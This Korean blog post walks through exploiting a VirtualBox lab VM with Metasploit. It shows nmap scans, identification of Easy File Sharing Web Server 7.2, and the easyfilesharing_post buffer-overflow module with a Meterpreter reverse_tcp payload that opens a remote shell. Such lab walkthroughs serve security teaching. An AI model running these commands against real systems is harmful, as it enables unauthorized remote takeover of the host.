HAHWUL auxiliary(vnc_login) > db_nmap -PN 192.168.56.101
[*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2017-08-07 15:17 KST
[*] Nmap: Nmap scan report for 192.168.56.101
[*] Nmap: Host is up (0.00072s latency).
[*] Nmap: Not shown: 983 closed ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 80/tcp open http
[*] Nmap: 135/tcp open msrpc
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 443/tcp open https
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: 554/tcp open rtsp
[*] Nmap: 2869/tcp open icslap
[*] Nmap: 5357/tcp open wsdapi
[*] Nmap: 5500/tcp open hotline
[*] Nmap: 5800/tcp open vnc-http
[*] Nmap: 5900/tcp open vnc
..snip..
nmap 결과 중 80(일반적인 웹) 포트에 대해 체크가 필요해보입니다.
HAHWUL > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.56.101 23 tcp telnet filtered
192.168.56.101 80 tcp http open
192.168.56.101 135 tcp msrpc open
192.168.56.101 137 udp netbios open HAHWUL:<00>:U :WORKGROUP:<00>:G :HAHWUL:<20>:U :WORKGROUP:<1e>:G :WORKGROUP:<1d>:U : __MSBROWSE__ :<01>:G :08:00:27:69:14:ff
192.168.56.101 139 tcp netbios-ssn open
192.168.56.101 443 tcp https open
192.168.56.101 445 tcp microsoft-ds open
192.168.56.101 554 tcp rtsp open
192.168.56.101 2869 tcp icslap open
192.168.56.101 5357 tcp wsdapi open
192.168.56.101 5500 tcp hotline open
192.168.56.101 5800 tcp vnc-http open
192.168.56.101 5900 tcp vnc open VNC protocol version [3, 4].8
192.168.56.101 10243 tcp unknown open
192.168.56.101 49152 tcp unknown open
192.168.56.101 49153 tcp unknown open
192.168.56.101 49154 tcp unknown open
192.168.56.101 49155 tcp unknown open
192.168.56.101 49156 tcp unknown open
NSE를 활용해서, 좀 더 자세하게 정보를 얻어보니..
HAHWUL > db_nmap --script=default -p 80 192.168.56.101
[*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2017-08-07 15:19 KST
[*] Nmap: Stats: 0:00:16 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
[*] Nmap: NSE Timing: About 99.07% done; ETC: 15:20 (0:00:00 remaining)
[*] Nmap: Nmap scan report for 192.168.56.101
[*] Nmap: Host is up (0.00051s latency).
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 80/tcp open http
[*] Nmap: |_http-title: Login - powered by Easy File Sharing Web Server
[*] Nmap: MAC Address: 08:00:27:69:14:FF (Oracle VirtualBox virtual NIC)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 19.94 seconds
Easy file Sharing Web server를 사용하고 있네요. 해당 서버는 공개 취약점이 어느정도 존재하는 서버이고, 관련해선 검색해보시면 많이 나올거라 생각됩니다.
바로 Metasploit을 통해 찾아봅니다.
HAHWUL > search easyfilesharing
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/ftp/easyfilesharing_pass 2006-07-31 average Easy File Sharing FTP Server 2.0 PASS Overflow
exploit/windows/http/easyfilesharing_post 2017-06-12 normal Easy File Sharing HTTP Server 7.2 POST Buffer Overflow
exploit/windows/http/easyfilesharing_seh 2015-12-02 normal Easy File Sharing HTTP Server 7.2 SEH Overflow
현재까지 기준으론 3개가 나오네요. 셋다 Overflow 취약점으로 원격에서 쉘 획득이 가능하죠.
맘에드는 것 하나를 골라준 후..
HAHWUL > use exploit/windows/http/easyfilesharing_post
HAHWUL exploit(easyfilesharing_post) > show options
Module options (exploit/windows/http/easyfilesharing_post):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 80 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Easy File Sharing 7.2 HTTP
세팅을 시작합니다.
HAHWUL exploit(easyfilesharing_post) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
HAHWUL exploit(easyfilesharing_post) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
HAHWUL exploit(easyfilesharing_post) > set LHOST 192.168.56.101
LHOST => 192.168.56.101
HAHWUL exploit(easyfilesharing_post) > set LPORT 4646
HAHWUL exploit(easyfilesharing_post) > show options
Module options (exploit/windows/http/easyfilesharing_post):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.56.101 yes The target address
RPORT 80 yes The target port (TCP)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.56.100 yes The listen address
LPORT 4646 yes The listen port
Exploit target:
Id Name
-- ----
0 Easy File Sharing 7.2 HTTP
Exploit 을 하게되면..
HAHWUL exploit(easyfilesharing_post) > exploit -z
[*] Started reverse TCP handler on 192.168.56.100:4646
[*] Sending stage (956991 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened ( 192.168.56.100:4646 -> 192.168.56.101:38258) at 2017-08-07 15:24:33 +0900
[*] Session 1 created in the background.
HAHWUL exploit(easyfilesharing_post) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/windows HAHWUL\Virtualbox @ HAHWUL 192.168.56.100:4646 -> 192.168.56.101:38258 (192.168.56.101)
meterpreter shell이 sessions 로 들어왔습니다. 정상적으로 공격에 성공한거지요.
HAHWUL exploit(easyfilesharing_post) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
meterpreter >
이러한 형태로 Remote Exploit이 가능합니다.
Reference
https://www.exploit-db.com/exploits/39661/
 |
HAHWULSecurity engineer, Gopher and H4cker!
 |
0 개의 댓글:
Post a Comment